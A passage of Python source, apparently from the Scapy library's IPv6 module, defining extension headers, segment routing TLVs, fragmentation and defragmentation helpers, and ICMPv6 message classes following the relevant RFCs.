953 overload_fields = {IPv6: {"nh": 0}} 

954 

955 

956# Destination Option Header # 

957 

958class IPv6ExtHdrDestOpt(_IPv6ExtHdr): 

959 name = "IPv6 Extension Header - Destination Options Header" 

960 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

961 FieldLenField("len", None, length_of="options", fmt="B", 

962 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), 

963 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

964 _OptionsField("options", [], HBHOptUnknown, 2, 

965 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 

966 overload_fields = {IPv6: {"nh": 60}} 

967 

968 

969# Routing Header # 

970 

971class IPv6ExtHdrRouting(_IPv6ExtHdr): 

972 name = "IPv6 Option Header Routing" 

973 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

974 FieldLenField("len", None, count_of="addresses", fmt="B", 

975 adjust=lambda pkt, x:2 * x), # in 8 bytes blocks # noqa: E501 

976 ByteField("type", 0), 

977 ByteField("segleft", None), 

978 BitField("reserved", 0, 32), # There is meaning in this field ... # noqa: E501 

979 IP6ListField("addresses", [], 

980 length_from=lambda pkt: 8 * pkt.len)] 

981 overload_fields = {IPv6: {"nh": 43}} 

982 

983 def post_build(self, pkt, pay): 

984 if self.segleft is None: 

985 pkt = pkt[:3] + struct.pack("B", len(self.addresses)) + pkt[4:] 

986 return _IPv6ExtHdr.post_build(self, pkt, pay) 

987 

988 

989# Segment Routing Header # 

990 

991# This implementation is based on RFC8754, but some older snippets come from: 

992# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06 

993 

994_segment_routing_header_tlvs = { 

995 # RFC 8754 sect 8.2 

996 0: "Pad1 TLV", 

997 1: "Ingress Node TLV", # draft 06 

998 2: "Egress Node TLV", # draft 06 

999 4: "PadN TLV", 

1000 5: "HMAC TLV", 

1001} 

1002 

1003 

1004class IPv6ExtHdrSegmentRoutingTLV(Packet): 

1005 name = "IPv6 Option Header Segment Routing - Generic TLV" 

1006 # RFC 8754 sect 2.1 

1007 fields_desc = [ByteEnumField("type", None, _segment_routing_header_tlvs), 

1008 ByteField("len", 0), 

1009 StrLenField("value", "", length_from=lambda pkt: pkt.len)] 

1010 

1011 def extract_padding(self, p): 

1012 return b"", p 

1013 

1014 registered_sr_tlv = {} 

1015 

1016 @classmethod 

1017 def register_variant(cls): 

1018 cls.registered_sr_tlv[cls.type.default] = cls 

1019 

1020 @classmethod 

1021 def dispatch_hook(cls, pkt=None, *args, **kargs): 

1022 if pkt: 

1023 tmp_type = ord(pkt[:1]) 

1024 return cls.registered_sr_tlv.get(tmp_type, cls) 

1025 return cls 

1026 

1027 

1028class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV): 

1029 name = "IPv6 Option Header Segment Routing - Ingress Node TLV" 

1030 # draft-ietf-6man-segment-routing-header-06 3.1.1 

1031 fields_desc = [ByteEnumField("type", 1, _segment_routing_header_tlvs), 

1032 ByteField("len", 18), 

1033 ByteField("reserved", 0), 

1034 ByteField("flags", 0), 

1035 IP6Field("ingress_node", "::1")] 

1036 

1037 

1038class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV): 

1039 name = "IPv6 Option Header Segment Routing - Egress Node TLV" 

1040 # draft-ietf-6man-segment-routing-header-06 3.1.2 

1041 fields_desc = [ByteEnumField("type", 2, _segment_routing_header_tlvs), 

1042 ByteField("len", 18), 

1043 ByteField("reserved", 0), 

1044 ByteField("flags", 0), 

1045 IP6Field("egress_node", "::1")] 

1046 

1047 

1048class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV): 

1049 name = "IPv6 Option Header Segment Routing - Pad1 TLV" 

1050 # RFC8754 sect 2.1.1.1, Pad1 is a single byte 

1051 fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs)] 

1052 

1053 

1054class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV): 

1055 name = "IPv6 Option Header Segment Routing - PadN TLV" 

1056 # RFC8754 sect 2.1.1.2 

1057 fields_desc = [ByteEnumField("type", 4, _segment_routing_header_tlvs), 

1058 FieldLenField("len", None, length_of="padding", fmt="B"), 

1059 StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501 

1060 

1061 

1062class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV): 

1063 name = "IPv6 Option Header Segment Routing - HMAC TLV" 

1064 # RFC8754 sect 2.1.2 

1065 fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs), 

1066 FieldLenField("len", None, length_of="hmac", 

1067 adjust=lambda _, x: x + 48), 

1068 BitField("D", 0, 1), 

1069 BitField("reserved", 0, 15), 

1070 IntField("hmackeyid", 0), 

1071 StrLenField("hmac", "", 

1072 length_from=lambda pkt: pkt.len - 48)] 

1073 

1074 

1075class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr): 

1076 name = "IPv6 Option Header Segment Routing" 

1077 # RFC8754 sect 2. + flag bits from draft 06 

1078 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

1079 ByteField("len", None), 

1080 ByteField("type", 4), 

1081 ByteField("segleft", None), 

1082 ByteField("lastentry", None), 

1083 BitField("unused1", 0, 1), 

1084 BitField("protected", 0, 1), 

1085 BitField("oam", 0, 1), 

1086 BitField("alert", 0, 1), 

1087 BitField("hmac", 0, 1), 

1088 BitField("unused2", 0, 3), 

1089 ShortField("tag", 0), 

1090 IP6ListField("addresses", ["::1"], 

1091 count_from=lambda pkt: (pkt.lastentry + 1)), 

1092 PacketListField("tlv_objects", [], 

1093 IPv6ExtHdrSegmentRoutingTLV, 

1094 length_from=lambda pkt: 8 * pkt.len - 16 * ( 

1095 pkt.lastentry + 1 

1096 ))] 

1097 

1098 overload_fields = {IPv6: {"nh": 43}} 

1099 

1100 def post_build(self, pkt, pay): 

1101 

1102 if self.len is None: 

1103 

1104 # The extension must be align on 8 bytes 

1105 tmp_mod = (-len(pkt) + 8) % 8 

1106 if tmp_mod == 1: 

1107 tlv = IPv6ExtHdrSegmentRoutingTLVPad1() 

1108 pkt += raw(tlv) 

1109 elif tmp_mod >= 2: 

1110 # Add the padding extension 

1111 tmp_pad = b"\x00" * (tmp_mod - 2) 

1112 tlv = IPv6ExtHdrSegmentRoutingTLVPadN(padding=tmp_pad) 

1113 pkt += raw(tlv) 

1114 

1115 tmp_len = (len(pkt) - 8) // 8 

1116 pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:] 

1117 

1118 if self.segleft is None: 

1119 tmp_len = len(self.addresses) 

1120 if tmp_len: 

1121 tmp_len -= 1 

1122 pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:] 

1123 

1124 if self.lastentry is None: 

1125 lastentry = len(self.addresses) 

1126 if lastentry == 0: 

1127 warning( 

1128 "IPv6ExtHdrSegmentRouting(): the addresses list is empty!" 

1129 ) 

1130 else: 

1131 lastentry -= 1 

1132 pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:] 

1133 

1134 return _IPv6ExtHdr.post_build(self, pkt, pay) 

1135 

1136 

1137# Fragmentation Header # 

1138 

1139class IPv6ExtHdrFragment(_IPv6ExtHdr): 

1140 name = "IPv6 Extension Header - Fragmentation header" 

1141 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

1142 BitField("res1", 0, 8), 

1143 BitField("offset", 0, 13), 

1144 BitField("res2", 0, 2), 

1145 BitField("m", 0, 1), 

1146 IntField("id", None)] 

1147 overload_fields = {IPv6: {"nh": 44}} 

1148 

1149 def guess_payload_class(self, p): 

1150 if self.offset > 0: 

1151 return Raw 

1152 else: 

1153 return super(IPv6ExtHdrFragment, self).guess_payload_class(p) 

1154 

1155 

1156def defragment6(packets): 

1157 """ 

1158 Performs defragmentation of a list of IPv6 packets. Packets are reordered. 

1159 Crap is dropped. What lacks is completed by 'X' characters. 

1160 """ 

1161 

1162 # Remove non fragments 

1163 lst = [x for x in packets if IPv6ExtHdrFragment in x] 

1164 if not lst: 

1165 return [] 

1166 

1167 id = lst[0][IPv6ExtHdrFragment].id 

1168 

1169 llen = len(lst) 

1170 lst = [x for x in lst if x[IPv6ExtHdrFragment].id == id] 

1171 if len(lst) != llen: 

1172 warning("defragment6: some fragmented packets have been removed from list") # noqa: E501 

1173 

1174 # reorder fragments 

1175 res = [] 

1176 while lst: 

1177 min_pos = 0 

1178 min_offset = lst[0][IPv6ExtHdrFragment].offset 

1179 for p in lst: 

1180 cur_offset = p[IPv6ExtHdrFragment].offset 

1181 if cur_offset < min_offset: 

1182 min_pos = 0 

1183 min_offset = cur_offset 

1184 res.append(lst[min_pos]) 

1185 del lst[min_pos] 

1186 

1187 # regenerate the fragmentable part 

1188 fragmentable = b"" 

1189 frag_hdr_len = 8 

1190 for p in res: 

1191 q = p[IPv6ExtHdrFragment] 

1192 offset = 8 * q.offset 

1193 if offset != len(fragmentable): 

1194 warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) # noqa: E501 

1195 frag_data_len = p[IPv6].plen 

1196 if frag_data_len is not None: 

1197 frag_data_len -= frag_hdr_len 

1198 fragmentable += b"X" * (offset - len(fragmentable)) 

1199 fragmentable += raw(q.payload)[:frag_data_len] 

1200 

1201 # Regenerate the unfragmentable part. 

1202 q = res[0].copy() 

1203 nh = q[IPv6ExtHdrFragment].nh 

1204 q[IPv6ExtHdrFragment].underlayer.nh = nh 

1205 q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable) 

1206 del q[IPv6ExtHdrFragment].underlayer.payload 

1207 q /= conf.raw_layer(load=fragmentable) 

1208 del q.plen 

1209 

1210 if q[IPv6].underlayer: 

1211 q[IPv6] = IPv6(raw(q[IPv6])) 

1212 else: 

1213 q = IPv6(raw(q)) 

1214 return q 

1215 

1216 

1217def fragment6(pkt, fragSize): 

1218 """ 

1219 Performs fragmentation of an IPv6 packet. 'fragSize' argument is the 

1220 expected maximum size of fragment data (MTU). The list of packets is 

1221 returned. 

1222 

1223 If packet does not contain an IPv6ExtHdrFragment class, it is added to 

1224 first IPv6 layer found. If no IPv6 layer exists packet is returned in 

1225 result list unmodified. 

1226 """ 

1227 

1228 pkt = pkt.copy() 

1229 

1230 if IPv6ExtHdrFragment not in pkt: 

1231 if IPv6 not in pkt: 

1232 return [pkt] 

1233 

1234 layer3 = pkt[IPv6] 

1235 data = layer3.payload 

1236 frag = IPv6ExtHdrFragment(nh=layer3.nh) 

1237 

1238 layer3.remove_payload() 

1239 del layer3.nh 

1240 del layer3.plen 

1241 

1242 frag.add_payload(data) 

1243 layer3.add_payload(frag) 

1244 

1245 # If the payload is bigger than 65535, a Jumbo payload must be used, as 

1246 # an IPv6 packet can't be bigger than 65535 bytes. 

1247 if len(raw(pkt[IPv6ExtHdrFragment])) > 65535: 

1248 warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") # noqa: E501 

1249 return [] 

1250 

1251 s = raw(pkt) # for instantiation to get upper layer checksum right 

1252 

1253 if len(s) <= fragSize: 

1254 return [pkt] 

1255 

1256 # Fragmentable part : fake IPv6 for Fragmentable part length computation 

1257 fragPart = pkt[IPv6ExtHdrFragment].payload 

1258 tmp = raw(IPv6(src="::1", dst="::1") / fragPart) 

1259 fragPartLen = len(tmp) - 40 # basic IPv6 header length 

1260 fragPartStr = s[-fragPartLen:] 

1261 

1262 # Grab Next Header for use in Fragment Header 

1263 nh = pkt[IPv6ExtHdrFragment].nh 

1264 

1265 # Keep fragment header 

1266 fragHeader = pkt[IPv6ExtHdrFragment] 

1267 del fragHeader.payload # detach payload 

1268 

1269 # Unfragmentable Part 

1270 unfragPartLen = len(s) - fragPartLen - 8 

1271 unfragPart = pkt 

1272 del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload 

1273 

1274 # Cut the fragmentable part to fit fragSize. Inner fragments have 

1275 # a length that is an integer multiple of 8 octets. last Frag MTU 

1276 # can be anything below MTU 

1277 lastFragSize = fragSize - unfragPartLen - 8 

1278 innerFragSize = lastFragSize - (lastFragSize % 8) 

1279 

1280 if lastFragSize <= 0 or innerFragSize == 0: 

1281 warning("Provided fragment size value is too low. " + 

1282 "Should be more than %d" % (unfragPartLen + 8)) 

1283 return [unfragPart / fragHeader / fragPart] 

1284 

1285 remain = fragPartStr 

1286 res = [] 

1287 fragOffset = 0 # offset, incremeted during creation 

1288 fragId = random.randint(0, 0xffffffff) # random id ... 

1289 if fragHeader.id is not None: # ... except id provided by user 

1290 fragId = fragHeader.id 

1291 fragHeader.m = 1 

1292 fragHeader.id = fragId 

1293 fragHeader.nh = nh 

1294 

1295 # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ... 

1296 while True: 

1297 if (len(remain) > lastFragSize): 

1298 tmp = remain[:innerFragSize] 

1299 remain = remain[innerFragSize:] 

1300 fragHeader.offset = fragOffset # update offset 

1301 fragOffset += (innerFragSize // 8) # compute new one 

1302 if IPv6 in unfragPart: 

1303 unfragPart[IPv6].plen = None 

1304 tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp) 

1305 res.append(tempo) 

1306 else: 

1307 fragHeader.offset = fragOffset # update offSet 

1308 fragHeader.m = 0 

1309 if IPv6 in unfragPart: 

1310 unfragPart[IPv6].plen = None 

1311 tempo = unfragPart / fragHeader / conf.raw_layer(load=remain) 

1312 res.append(tempo) 

1313 break 

1314 return res 

1315 

1316 

1317############################################################################# 

1318############################################################################# 

1319# ICMPv6* Classes # 

1320############################################################################# 

1321############################################################################# 

1322 

1323 

1324icmp6typescls = {1: "ICMPv6DestUnreach", 

1325 2: "ICMPv6PacketTooBig", 

1326 3: "ICMPv6TimeExceeded", 

1327 4: "ICMPv6ParamProblem", 

1328 128: "ICMPv6EchoRequest", 

1329 129: "ICMPv6EchoReply", 

1330 130: "ICMPv6MLQuery", # MLDv1 or MLDv2 

1331 131: "ICMPv6MLReport", 

1332 132: "ICMPv6MLDone", 

1333 133: "ICMPv6ND_RS", 

1334 134: "ICMPv6ND_RA", 

1335 135: "ICMPv6ND_NS", 

1336 136: "ICMPv6ND_NA", 

1337 137: "ICMPv6ND_Redirect", 

1338 # 138: Do Me - RFC 2894 - Seems painful 

1339 139: "ICMPv6NIQuery", 

1340 140: "ICMPv6NIReply", 

1341 141: "ICMPv6ND_INDSol", 

1342 142: "ICMPv6ND_INDAdv", 

1343 143: "ICMPv6MLReport2", 

1344 144: "ICMPv6HAADRequest", 

1345 145: "ICMPv6HAADReply", 

1346 146: "ICMPv6MPSol", 

1347 147: "ICMPv6MPAdv", 

1348 # 148: Do Me - SEND related - RFC 3971 

1349 # 149: Do Me - SEND related - RFC 3971 

1350 151: "ICMPv6MRD_Advertisement", 

1351 152: "ICMPv6MRD_Solicitation", 

1352 153: "ICMPv6MRD_Termination", 

1353 # 154: Do Me - FMIPv6 Messages - RFC 5568 

1354 155: "ICMPv6RPL", # RFC 6550 

1355 } 

1356 

1357icmp6typesminhdrlen = {1: 8, 

1358 2: 8, 

1359 3: 8, 

1360 4: 8, 

1361 128: 8, 

1362 129: 8, 

1363 130: 24, 

1364 131: 24, 

1365 132: 24, 

1366 133: 8, 

1367 134: 16, 

1368 135: 24, 

1369 136: 24, 

1370 137: 40, 

1371 # 139: 

1372 # 140 

1373 141: 8, 

1374 142: 8, 

1375 143: 8, 

1376 144: 8, 

1377 145: 8, 

1378 146: 8, 

1379 147: 8, 

1380 151: 8, 

1381 152: 4, 

1382 153: 4, 

1383 155: 4 

1384 } 

1385 

1386icmp6types = {1: "Destination unreachable", 

1387 2: "Packet too big", 

1388 3: "Time exceeded", 

1389 4: "Parameter problem", 

1390 100: "Private Experimentation", 

1391 101: "Private Experimentation", 

1392 128: "Echo Request", 

1393 129: "Echo Reply", 

1394 130: "MLD Query", 

1395 131: "MLD Report", 

1396 132: "MLD Done", 

1397 133: "Router Solicitation", 

1398 134: "Router Advertisement", 

1399 135: "Neighbor Solicitation", 

1400 136: "Neighbor Advertisement", 

1401 137: "Redirect Message", 

1402 138: "Router Renumbering", 

1403 139: "ICMP Node Information Query", 

1404 140: "ICMP Node Information Response", 

1405 141: "Inverse Neighbor Discovery Solicitation Message", 

1406 142: "Inverse Neighbor Discovery Advertisement Message", 

1407 143: "MLD Report Version 2", 

1408 144: "Home Agent Address Discovery Request Message", 

1409 145: "Home Agent Address Discovery Reply Message", 

1410 146: "Mobile Prefix Solicitation", 

1411 147: "Mobile Prefix Advertisement", 

1412 148: "Certification Path Solicitation", 

1413 149: "Certification Path Advertisement", 

1414 151: "Multicast Router Advertisement", 

1415 152: "Multicast Router Solicitation", 

1416 153: "Multicast Router Termination", 

1417 155: "RPL Control Message", 

1418 200: "Private Experimentation", 

1419 201: "Private Experimentation"} 

1420 

1421 

1422class _ICMPv6(Packet): 

1423 name = "ICMPv6 dummy class" 

1424 overload_fields = {IPv6: {"nh": 58}} 

1425 

1426 def post_build(self, p, pay): 

1427 p += pay 

1428 if self.cksum is None: 

1429 chksum = in6_chksum(58, self.underlayer, p) 

1430 p = p[:2] + struct.pack("!H", chksum) + p[4:] 

1431 return p 

1432 

1433 def hashret(self): 

1434 return self.payload.hashret() 

1435 

1436 def answers(self, other): 

1437 # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ... 

1438 if (isinstance(self.underlayer, IPerror6) or 

1439 isinstance(self.underlayer, _IPv6ExtHdr) and 

1440 isinstance(other, _ICMPv6)): 

1441 if not ((self.type == other.type) and 

1442 (self.code == other.code)): 

1443 return 0 

1444 return 1 

1445 return 0 

1446 

1447 

1448class _ICMPv6Error(_ICMPv6): 

1449 name = "ICMPv6 errors dummy class" 

1450 

1451 def guess_payload_class(self, p): 

1452 return IPerror6 

1453 

1454 

1455class ICMPv6Unknown(_ICMPv6): 

1456 name = "Scapy6 ICMPv6 fallback class" 

1457 fields_desc = [ByteEnumField("type", 1, icmp6types), 

1458 ByteField("code", 0), 

1459 XShortField("cksum", None), 

1460 StrField("msgbody", "")] 

1461 

1462 

1463# RFC 2460 # 

1464 

1465class ICMPv6DestUnreach(_ICMPv6Error): 

1466 name = "ICMPv6 Destination Unreachable" 

1467 fields_desc = [ByteEnumField("type", 1, icmp6types), 

1468 ByteEnumField("code", 0, {0: "No route to destination", 

1469 1: "Communication with destination administratively prohibited", # noqa: E501 

1470 2: "Beyond scope of source address", # noqa: E501 

1471 3: "Address unreachable", 

1472 4: "Port unreachable"}), 

1473 XShortField("cksum", None), 

1474 ByteField("length", 0), 

1475 X3BytesField("unused", 0), 

1476 _ICMPExtensionPadField(), 

1477 _ICMPExtensionField()] 

1478 post_dissection = _ICMP_extpad_post_dissection 

1479 

1480 

1481class ICMPv6PacketTooBig(_ICMPv6Error): 

1482 name = "ICMPv6 Packet Too Big" 

1483 fields_desc = [ByteEnumField("type", 2, icmp6types), 

1484 ByteField("code", 0), 

1485 XShortField("cksum", None), 

1486 IntField("mtu", 1280)] 

1487 

1488 

1489class ICMPv6TimeExceeded(_ICMPv6Error): 

1490 name = "ICMPv6 Time Exceeded" 

1491 fields_desc = [ByteEnumField("type", 3, icmp6types), 

1492 ByteEnumField("code", 0, {0: "hop limit exceeded in transit", # noqa: E501 

1493 1: "fragment reassembly time exceeded"}), # noqa: E501 

1494 XShortField("cksum", None), 

1495 ByteField("length", 0), 

1496 X3BytesField("unused", 0), 

1497 _ICMPExtensionPadField(), 

1498 _ICMPExtensionField()] 

1499 post_dissection = _ICMP_extpad_post_dissection 

1500 

1501 

1502# The default pointer value is set to the next header field of 

1503# the encapsulated IPv6 packet 

1504 

1505 

1506class ICMPv6ParamProblem(_ICMPv6Error): 

1507 name = "ICMPv6 Parameter Problem" 

1508 fields_desc = [ByteEnumField("type", 4, icmp6types), 

1509 ByteEnumField( 

1510 "code", 0, 

1511 {0: "erroneous header field encountered", 

1512 1: "unrecognized Next Header type encountered", 

1513 2: "unrecognized IPv6 option encountered", 

1514 3: "first fragment has incomplete header chain"}), 

1515 XShortField("cksum", None), 

1516 IntField("ptr", 6)] 

1517 

1518 

1519class ICMPv6EchoRequest(_ICMPv6): 

1520 name = "ICMPv6 Echo Request" 

1521 fields_desc = [ByteEnumField("type", 128, icmp6types), 

1522 ByteField("code", 0), 

1523 XShortField("cksum", None), 

1524 XShortField("id", 0), 

1525 XShortField("seq", 0), 

1526 StrField("data", "")] 

1527 

1528 def mysummary(self): 

1529 return self.sprintf("%name% (id: %id% seq: %seq%)") 

1530 

1531 def hashret(self): 

1532 return struct.pack("HH", self.id, self.seq) + self.payload.hashret() 

1533 

1534 

1535class ICMPv6EchoReply(ICMPv6EchoRequest): 

1536 name = "ICMPv6 Echo Reply" 

1537 type = 129 

1538 

1539 def answers(self, other): 

1540 # We could match data content between request and reply. 

1541 return (isinstance(other, ICMPv6EchoRequest) and 

1542 self.id == other.id and self.seq == other.seq and 

1543 self.data == other.data) 

1544 

1545 

1546# ICMPv6 Multicast Listener Discovery (RFC2710) # 

1547 

1548# tous les messages MLD sont emis avec une adresse source lien-locale 

1549# -> Y veiller dans le post_build si aucune n'est specifiee 

1550# La valeur de Hop-Limit doit etre de 1 

1551# "and an IPv6 Router Alert option in a Hop-by-Hop Options 

1552# header. (The router alert option is necessary to cause routers to 

1553# examine MLD messages sent to multicast addresses in which the router 

1554# itself has no interest" 

1555class _ICMPv6ML(_ICMPv6): 

1556 fields_desc = [ByteEnumField("type", 130, icmp6types), 

1557 ByteField("code", 0), 

1558 XShortField("cksum", None), 

1559 ShortField("mrd", 0), 

1560 ShortField("reserved", 0), 

1561 IP6Field("mladdr", "::")] 

1562 

1563# general queries are sent to the link-scope all-nodes multicast 

1564# address ff02::1, with a multicast address field of 0 and a MRD of 

1565# [Query Response Interval] 

1566# Default value for mladdr is set to 0 for a General Query, and 

1567# overloaded by the user for a Multicast Address specific query 

1568# TODO : See what we can do to automatically include a Router Alert 

1569# Option in a Destination Option Header. 

1570 

1571 

1572class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710 

1573 name = "MLD - Multicast Listener Query" 

1574 type = 130 

1575 mrd = 10000 # 10s for mrd 

1576 mladdr = "::" 

1577 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}} 

1578 

1579 

1580# TODO : See what we can do to automatically include a Router Alert 

1581# Option in a Destination Option Header. 

1582class ICMPv6MLReport(_ICMPv6ML): # RFC 2710 

1583 name = "MLD - Multicast Listener Report" 

1584 type = 131 

1585 overload_fields = {IPv6: {"hlim": 1, "nh": 58}} 

1586 

1587 def answers(self, query): 

1588 """Check the query type""" 

1589 return ICMPv6MLQuery in query 

1590 

1591# When a node ceases to listen to a multicast address on an interface, 

1592# it SHOULD send a single Done message to the link-scope all-routers 

1593# multicast address (FF02::2), carrying in its multicast address field 

1594# the address to which it is ceasing to listen 

1595# TODO : See what we can do to automatically include a Router Alert 

1596# Option in a Destination Option Header. 

1597 

1598 

1599class ICMPv6MLDone(_ICMPv6ML): # RFC 2710 

1600 name = "MLD - Multicast Listener Done" 

1601 type = 132 

1602 overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}} 

1603 

1604 

1605# Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) # 

1606 

1607class ICMPv6MLQuery2(_ICMPv6): # RFC 3810 

1608 name = "MLDv2 - Multicast Listener Query" 

1609 fields_desc = [ByteEnumField("type", 130, icmp6types), 

1610 ByteField("code", 0), 

1611 XShortField("cksum", None), 

1612 ShortField("mrd", 10000), 

1613 ShortField("reserved", 0), 

1614 IP6Field("mladdr", "::"), 

1615 BitField("Resv", 0, 4), 

1616 BitField("S", 0, 1), 

1617 BitField("QRV", 0, 3), 

1618 ByteField("QQIC", 0), 

1619 ShortField("sources_number", None), 

1620 IP6ListField("sources", [], 

1621 count_from=lambda pkt: pkt.sources_number)] 

1622 

1623 # RFC8810 - 4. Message Formats 

1624 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}} 

1625 

1626 def post_build(self, packet, payload): 

1627 """Compute the 'sources_number' field when needed""" 

1628 if self.sources_number is None: 

1629 srcnum = struct.pack("!H", len(self.sources)) 

1630 packet = packet[:26] + srcnum + packet[28:] 

1631 return _ICMPv6.post_build(self, packet, payload) 

1632 

1633 

1634class ICMPv6MLDMultAddrRec(Packet): 

1635 name = "ICMPv6 MLDv2 - Multicast Address Record" 

1636 fields_desc = [ByteField("rtype", 4), 

1637 FieldLenField("auxdata_len", None, 

1638 length_of="auxdata", 

1639 fmt="B"), 

1640 FieldLenField("sources_number", None, 

1641 length_of="sources", 

1642 adjust=lambda p, num: num // 16), 

1643 IP6Field("dst", "::"), 

1644 IP6ListField("sources", [], 

1645 length_from=lambda p: 16 * p.sources_number), 

1646 StrLenField("auxdata", "", 

1647 length_from=lambda p: p.auxdata_len)] 

1648 

1649 def default_payload_class(self, packet): 

1650 """Multicast Address Record followed by another one""" 

1651 return self.__class__ 

1652 

1653 

1654class ICMPv6MLReport2(_ICMPv6): # RFC 3810 

1655 name = "MLDv2 - Multicast Listener Report" 

1656 fields_desc = [ByteEnumField("type", 143, icmp6types), 

1657 ByteField("res", 0), 

1658 XShortField("cksum", None), 

1659 ShortField("reserved", 0), 

1660 ShortField("records_number", None), 

1661 PacketListField("records", [], 

1662 ICMPv6MLDMultAddrRec, 

1663 count_from=lambda p: p.records_number)] 

1664 

1665 # RFC8810 - 4. Message Formats 

1666 overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}} 

1667 

1668 def post_build(self, packet, payload): 

1669 """Compute the 'records_number' field when needed""" 

1670 if self.records_number is None: 

1671 recnum = struct.pack("!H", len(self.records)) 

1672 packet = packet[:6] + recnum + packet[8:] 

1673 return _ICMPv6.post_build(self, packet, payload) 

1674 

1675 def answers(self, query): 

1676 """Check the query type""" 

1677 return isinstance(query, ICMPv6MLQuery2) 

1678 

1679 

1680# ICMPv6 MRD - Multicast Router Discovery (RFC 4286) # 

1681 

1682# TODO: 

1683# - 04/09/06 troglocan : find a way to automatically add a router alert 

1684# option for all MRD packets. This could be done in a specific 

1685# way when IPv6 is the under layer with some specific keyword 

1686# like 'exthdr'. This would allow to keep compatibility with 

1687# providing IPv6 fields to be overloaded in fields_desc. 

1688# 

1689# At the moment, if user inserts an IPv6 Router alert option 

1690# none of the IPv6 default values of IPv6 layer will be set. 

1691 

1692class ICMPv6MRD_Advertisement(_ICMPv6): 

1693 name = "ICMPv6 Multicast Router Discovery Advertisement" 

1694 fields_desc = [ByteEnumField("type", 151, icmp6types), 

1695 ByteField("advinter", 20), 

1696 XShortField("cksum", None), 

1697 ShortField("queryint", 0), 

1698 ShortField("robustness", 0)] 

1699 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}} 

1700 # IPv6 Router Alert requires manual inclusion 

1701 

1702 def extract_padding(self, s): 

1703 return s[:8], s[8:] 

1704 

1705 

1706class ICMPv6MRD_Solicitation(_ICMPv6): 

1707 name = "ICMPv6 Multicast Router Discovery Solicitation" 

1708 fields_desc = [ByteEnumField("type", 152, icmp6types), 

1709 ByteField("res", 0), 

1710 XShortField("cksum", None)] 

1711 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}} 

1712 # IPv6 Router Alert requires manual inclusion 

1713 

1714 def extract_padding(self, s): 

1715 return s[:4], s[4:] 

1716 

1717 

1718class ICMPv6MRD_Termination(_ICMPv6): 

1719 name = "ICMPv6 Multicast Router Discovery Termination" 

1720 fields_desc = [ByteEnumField("type", 153, icmp6types), 

1721 ByteField("res", 0), 

1722 XShortField("cksum", None)] 

1723 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}} 

1724 # IPv6 Router Alert requires manual inclusion 

1725 

1726 def extract_padding(self, s): 

1727 return s[:4], s[4:] 

1728 

1729 

1730# ICMPv6 Neighbor Discovery (RFC 2461) # 

1731 

1732icmp6ndopts = {1: "Source Link-Layer Address", 

1733 2: "Target Link-Layer Address", 

1734 3: "Prefix Information", 

1735 4: "Redirected Header", 

1736 5: "MTU", 

1737 6: "NBMA Shortcut Limit Option", # RFC2491 

1738 7: "Advertisement Interval Option", 

1739 8: "Home Agent Information Option", 

1740 9: "Source Address List", 

1741 10: "Target Address List", 

1742 11: "CGA Option", # RFC 3971 

1743 12: "RSA Signature Option", # RFC 3971 

1744 13: "Timestamp Option", # RFC 3971 

1745 14: "Nonce option", # RFC 3971 

1746 15: "Trust Anchor Option", # RFC 3971 

1747 16: "Certificate Option", # RFC 3971 

1748 17: "IP Address Option", # RFC 4068 

1749 18: "New Router Prefix Information Option", # RFC 4068 

1750 19: "Link-layer Address Option", # RFC 4068 

1751 20: "Neighbor Advertisement Acknowledgement Option", 

1752 21: "CARD Request Option", # RFC 4065/4066/4067 

1753 22: "CARD Reply Option", # RFC 4065/4066/4067 

1754 23: "MAP Option", # RFC 4140 

1755 24: "Route Information Option", # RFC 4191 

1756 25: "Recursive DNS Server Option", 

1757 26: "IPv6 Router Advertisement Flags Option" 

1758 } 

1759 

1760icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr", 

1761 2: "ICMPv6NDOptDstLLAddr", 

1762 3: "ICMPv6NDOptPrefixInfo", 

1763 4: "ICMPv6NDOptRedirectedHdr", 

1764 5: "ICMPv6NDOptMTU", 

1765 6: "ICMPv6NDOptShortcutLimit", 

1766 7: "ICMPv6NDOptAdvInterval", 

1767 8: "ICMPv6NDOptHAInfo", 

1768 9: "ICMPv6NDOptSrcAddrList", 

1769 10: "ICMPv6NDOptTgtAddrList", 

